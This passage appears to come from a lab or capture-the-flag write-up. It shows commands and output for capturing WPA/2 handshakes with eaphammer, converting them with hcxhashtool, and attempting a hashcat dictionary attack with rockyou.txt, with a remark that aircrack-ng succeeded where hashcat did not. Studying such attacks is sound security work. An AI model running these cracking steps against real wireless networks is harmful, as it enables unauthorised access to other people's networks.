[*] WPA handshakes will be saved to /root/eaphammer/loot/wpa_handshake_capture-2026-02-05-16-34-09-1Bo6xAKYGJVYGJdhuxgH4xAXHv48JWdg.hccapx
We get:
[EAPHAMMER] Captured a WPA/2 handshake from: 28:6c:07:fe:a3:22
[EAPHAMMER] Captured a WPA/2 handshake from: 28:6c:07:fe:a3:22
Download file loot/wpa_handshake_capture-2026-02-05-16-34-09-1Bo6xAKYGJVYGJdhuxgH4xAXHv48JWdg.hccapx, for example with scp.
hcxhashtool --hccapx-in wpa_handshake_capture-2026-02-05-16-34-09-1Bo6xAKYGJVYGJdhuxgH4xAXHv48JWdg.hccapx -o hashes.txt
In this case all hashes in hashes.txt are identical, so take one and put it in file hash.
./hashcat/hashcat -a 0 -m 22000 ./hash ./rockyou.txt
Interestingly it does not crack. But if we crack the handshake captured with airodump-ng using aircrack-ng, we can crack the password.